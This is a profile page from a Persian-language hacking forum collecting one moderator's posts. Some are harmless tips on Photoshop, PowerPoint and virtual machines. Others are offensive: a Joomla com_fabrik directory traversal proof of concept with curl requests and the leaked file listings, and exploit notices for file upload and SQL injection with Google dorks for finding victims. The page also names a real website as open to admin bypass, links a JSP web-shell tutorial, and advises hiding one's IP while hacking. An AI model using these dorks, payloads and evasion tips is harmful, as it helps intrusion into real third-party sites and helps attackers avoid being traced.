رفتن به مطلب



iran rules jazbe modir
ADS mahak

Moeein Seven

 مدیر تیم
  • تعداد ارسال ها

    8,904
  • امتیاز

    42,200 
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    239

تمامی مطالب نوشته شده توسط Moeein Seven

  1. Moeein Seven

    Hacking کمک در مورد حذف ریدایرکت های اسپم

    دوست عزیز منظورتون رو دزست متوجه نشدم اگه امکانش هست چند تا عکس مرتبط ارسال کنید...
  2. معلومه که با یه شماره چند تا اکانت نمیشه ساخت با یه شماره دیگه امتحان کن و ربطی به مودم و... نداره چون از فیلتر شکن استفاده میکنی و با یه ایپی مشخص وارد نمیشی
  3. سلام تا سال 2019 این کار جواب میداد و باعث دیده شدن پیج شما میشد ولی الگوریتم جدید اینستا (2019) و هوش مصنوییش میتونه تشخیص بده که هشتگ هایی که استفاده میکنید ربطی به پست یا استوری داره یا نه پس برای بالا رفتن پیجتون از هشتگ های مرتبط استفاده کنید موفق باشید
  4. Moeein Seven

    Hacking-Penetration testing to the site JSP Bug

    همونطور که گفتم دیگه اصلا سایتی پیدا نمیشه که این اسیب پذیری رو داشته باشه همون روزی هم که من این ویدو اموزشی رو ریکورد کردم به سختی همون سایت رو پیدا کردم الان اونم دیگه کار نمیکنه
  5. Moeein Seven

    Hacking-Penetration testing to the site JSP Bug

    همون سایتی که تو ویدیو آموزشی تست شده رو امتحان کن به احتمال زیاد هنوزم کار کنه
  6. Moeein Seven

    Hacking-Penetration testing to the site JSP Bug

    کلا این روش منسوخ شده و دیگه سایتی پیدا نمیشه که این باگ رو داشته باشه با این حال این ویدیو اموزشی که مال خیلی وقت پیش هست میتونه کمکتون کنه : http://yekupload.ir/1639fa9ba9b0eab6/اموزش_باگ_jsp.mp4 در کل اگه علاقه ای به تست نفوذ به سایت ها دارید میتونید از این بخش های انجمن بازدید کنید : https://anonysec.org/forum/45-باگ-ها/ https://anonysec.org/forum/47-تست-نفوذ-به-سایت/ https://anonysec.org/forum/50-مباحث-آموزش-هک/ موفق باشید
  7. Moeein Seven

    FAQ-Cyber Security roadmap

    میتونید بخش امنیت انجمن رو بررسی کنید و اگه مشکل یا ایراد خاصی دارید اینجا مطرح کنید https://anonysec.org/forum/52-امنیت/
  8. دوست عزیز خب از یه سیستم دیگه استفاده کن مثلا موبایل یا اینکه از اروری که فیسبوک برای اهراز هویت میده یه عکس بفرست تا بتونیم مشکلت رو حل کنیم
  9. Moeein Seven

    Hacking-Penetration testing to the site JSP Bug

    لینک جدید قرار داده شد ... jsp shell
  10. Moeein Seven

    Hacking-Penetration testing to the site JSP Bug

    بزودی قرار میدم
  11. Moeein Seven

    هک سایت با استفاده از cmd

    دوست عزیز برای این کار راه های زیادی وجود داره ولی اولین و اصلی ترینش اینه که با ip اصلی خودتون کاری رو انجام ندید میتونید از vpn را روش های دیگه تغییر ip استفاده کنید ولی در کل اگه چیز خیلی مهمی رو میخواید هک کنید اصلا از سیستم خودتون استفاده نکنید...
  12. قطعا تا به امروز شده که در عکس‌ها و تصاویری که هر روز مشاهده می‌کنید بخواهید فونتی که در آن تصویر یا نوشته استفاده شده است را شما نیز استفاده کنید. با استفاده از نرم افزار Adobe Photoshop CC ابزار ناشناخته‌ای وجود دارد که می‌تواند فونت موجود در تصاویر را به راحتی تشخیص دهد. قابلیت تطابق فونت Match Font در نرم‌افزار فتوشاپ نسخه CC 2015 به بعد وجود دارد. فتوشاپ یک ابزار دقیق برای معرفی نزدیک‌ترین فونت یا شناسایی دقیق فونت‌های به‌کار رفته در تصاویر را دار می‌باشد. که می‌توانید به استفاده از مراحل زیر فونت مورد نظر خود را پیدا کنید. تصویر را باز کنید و جعبه انتخابی به عنوان مثال مستطیلی را در اطراف متن مورد نظر برای تجزیه و تحلیل بکشید. Type> Match Font را انتخاب کنید. فتوشاپ لیستی از فونت‌های نصب شده در سیستم شما را که شبیه فونت در تصویر هستند، به شما نشان می‌دهد. پیشنهادات شامل فونت‌های Typekit می‌شوند. شما می‌توانید نمایش فونت موجود برای همگام‌سازی از Typekit را انتخاب کنید تا فقط فونت‌های موجود در رایانه خود را مشاهده کنید. از نتایج پیشنهاد شده، روی فونت نزدیک به فونت در تصویر کلیک کنید. در مرحله آخر فونت مورد نظر که شباهت بیشتری به فونت تصویر یا نوشته مورد نظر شما را دارد انتخاب کنید. انتخاب دقیق شانس موفقیت شما را بهبود می‌بخشد. قبل از انتخاب محدوده فونت تصویر را درست کنید یا چشم‌انداز تصویر را اصلاح کنید. انتخاب را به صورت متن به متن نزدیک‌تر کنید. همچنین، انتخاب را به یک خط از متن محدود کنید تا به نتایج دقیق‌تر برسید. موفق باشید
  13. این نیز بگذرد...

  14. اگر ارائه پاورپوینت خود را به کسی ارسال می کنید ، اما فونت های استفاده شده را نصب نمی کنند ، قالب بندی و طرح می تواند اشتباه شود. با تعبیه فونت ها در ارائه خود می توانید از وقوع این امر جلوگیری کنید. در اینجا نحوه کار در Windows آورده شده است. برای تعبیه فونت های استفاده شده در ارائه پاورپوینت ، پرونده مربوطه را باز کرده و برگه “File” را انتخاب کنید. در پایین صفحه سمت چپ ، “Options” را انتخاب کنید. پنجره “PowerPoint Options” ظاهر می شود. در قسمت سمت چپ ، گزینه “Save” را انتخاب کنید. در مرحله بعد ، “Preserve Fidelity When Sharing This Presentation” را در انتهای پنجره پیدا کرده و کادر کنار “Embed Fonts in the File.” را علامت بزنید. سپس لازم است بین این دو گزینه تعبیه تصمیم بگیرید: فقط کاراکترهای مورد استفاده در ارائه را وارد کنید (بهترین گزینه برای کاهش اندازه پرونده) قراردادن همه شخصیت ها (بهترین ویرایش توسط افراد دیگر) پس از اتمام “OK” را انتخاب کنید. اکنون فونت ها در ارائه شما جاسازی می شوند. موفق باشید
  15. ################################################################### # Exploit Title : Interphoto Remote file upload # Author : AnonySec # Team : www.anonysec.org # Google Dork : intext:"interphoto register" # Tested On : Windows 10 / Linux # Version : All Versions ################################################################### ################################################################### # Describe : At The First Search Dork And Choose A Target Then You Have To Registeration. When You Do It,you Will Go To The Upload Piece In Your Target. # Demo : http://demosite.center/interphoto/register.html ################################################################### ################################################################### # Discovered by ==> Moeein Seven | www.moeein.ir # Tnx to ==> Reza Cloner , Sheikh Shahin , Doctor Robot , RednofoZi and all bax from AnonySec Team... ################################################################### http://exploit4arab.org/exploits/2445 https://cxsecurity.com/issue/WLB-2020040165
  16. اکثرا با همون فرمت iso نصب میکنن از ova اطلاعی ندارم با این حال تاپیک رو توی اخرین ارسال ها نگه میداریم تا اگر کسی اطلاعی داره پاسخگو باشه موفق باشید
  17. این هم ویدیو اموزش نصب کالی روی ماشین مجازی که @Rednofozi زحمت تهیه اش رو کشیده https://www.aparat.com/v/eFYth
  18. دوست عزیز من خودم همیشه از ماشین مجازی VMware استفاده میکنم و پیشنهاد میکنم شما هم همین کارو بکنید تجربه ثابت کرده که سرعت VMware خیلی از virtualbox بیشتر هست با این حال اگر میخواهید از virtualbox استفاده کنید بزودی ویدیو اموزشی نصب گام به گامش رو روی انجمن قرار میدم تا استفاده کنید
  19. ############################################################### # Title : Web Designed by MaxPower SQL Injection # Author : AnonySec # Vendor : www.smtmax.com/ # Tasted on : Win 10 , Kali linux # Dork : inurl: php?id= "powered by max" ############################################################### ##################################################### demo ==> https://www.smtmax.com/category.php?id=15 ##################################################### #Discovered by : Moeein Seven | www.moeein.ir #my Team : www.AnonySec.org #Thanks to : Reza Cloner , Sh3ikh Shahin , Milad Shadow , Rednofozi , SoldierAnonymous , DoctorRobot , BlackPetya and all bax from AnonySec Team ... https://cxsecurity.com/issue/WLB-2020040116 http://exploit4arab.org/exploits/2438
  20. Moeein Seven

    Hacking-Database مشکل

    دوست عزیز لطفا سوالات و مشکلات خود را در بخش پرسش و پاسخ ارسال کنید با تشکر - تاپیک به بخش پرسش و پاسخ منتقل شد...
  21. http://www.gayatrinursing.org/admin admin page bypass
  22. inurl:human.aspx intext:moveit sql injection
  23. intext:Designed and Developed by Vibhuti Infotech admin page bypass
  24. # Exploit Title: Joomla! com_fabrik 3.9.11 - Directory Traversal #Google Dork: inurl:"index.php?option=com_fabrik" #Date: 2020-03-30 #Vendor Homepage: https://fabrikar.com/ #Software Link: https://fabrikar.com/downloads #Version: 3.9 #Tested on: Debian/Nginx/Joomla! 3.9.11 ################################################################## #Vulnerability details ################################################################## File: fabrik_element/image/image.php Func: onAjax_files 394 public function onAjax_files() 395 { 396 $this->loadMeForAjax(); 397 $folder = $this->app->input->get('folder', '', 'string'); //!!!Possible to directory-traversal. 398 399 if (!strstr($folder, JPATH_SITE)) 400 { 401 $folder = JPATH_SITE . '/' . $folder; 402 } 403 404 $pathA = JPath::clean($folder); 405 $folder = array(); 406 $files = array(); 407 $images = array(); 408 FabrikWorker::readImages($pathA, "/", $folders, $images, $this->ignoreFolders); 409 410 if (!array_key_exists('/', $images)) 411 { 412 $images['/'] = array(); 413 } 414 415 echo json_encode($images['/']); 416 } ################################################################## #PoC ################################################################## $> curl -X GET -i "http://127.0.0.1/joomla/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/" ...snip... [{"value":"eila.jpg","text":"eila.jpg","disable":false},{"value":"eilanya.jpg","text":"eilanya.jpg","disable":false},{"value":"topsecret.png","text":"topsecret.png","disable":false}] ...snip... $> curl -X GET -i "http://127.0.0.1/joomla/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../home/user123/Pictures/" ...snip... [{"value":"Revision2017_Banner.jpg","text":"Revision2017_Banner.jpg","disable":false},{"value":"Screenshot from 2019-02-23 22-43-54.png","text":"Screenshot from 2019-02-23 22-43-54.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-22.png","text":"Screenshot from 2019-03-09 14-59-22.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-25.png","text":"Screenshot from 2019-03-09 14-59-25.png","disable":false},{"value":"Screenshot from 2019-03-16 23-17-05.png","text":"Screenshot from 2019-03-16 23-17-05.png","disable":false},{"value":"Screenshot from 2019-03-18 07-30-41.png","text":"Screenshot from 2019-03-18 07-30-41.png","disable":false},{"value":"Screenshot from 2019-03-18 08-23-45.png","text":"Screenshot from 2019-03-18 08-23-45.png","disable":false},{"value":"Screenshot from 2019-04-08 00-09-36.png","text":"Screenshot from 2019-04-08 00-09-36.png","disable":false},{"value":"Screenshot from 2019-04-08 10-34-23.png","text":"Screenshot from 2019-04-08 10-34-23.png","disable":false},{"value":"Screenshot from 2019-04-13 08-23-48.png","text":"Screenshot from 2019-04-13 08-23-48.png","disable":false},{"value":"Screenshot from 2019-05-24 23-14-05.png","text":"Screenshot from 2019-05-24 23-14-05.png","disable":false},{"value":"b.jpg","text":"b.jpg","disable":false},{"value":"by_gh0uli.tumblr.com-8755.png.jpeg","text":"by_gh0uli.tumblr.com-8755.png.jpeg","disable":false},{"value":"max_payne_06.jpg","text":"max_payne_06.jpg","disable":false},{"value":"xxx.jpg","text":"xxx.jpg","disable":false}] ...snip... ################################################################## #Q&D Patch (DO NOT USE :3) ################################################################## --- ./image.php --- +++ image_patched.php --- @@ -394,7 +394,7 @@ public function onAjax_files() { $this->loadMeForAjax(); - $folder = $this->app->input->get('folder', '', 'string'); + $folder = $this->app->input->get('folder', '', 'cmd'); if (!strstr($folder, JPATH_SITE)) {
×
×
  • جدید...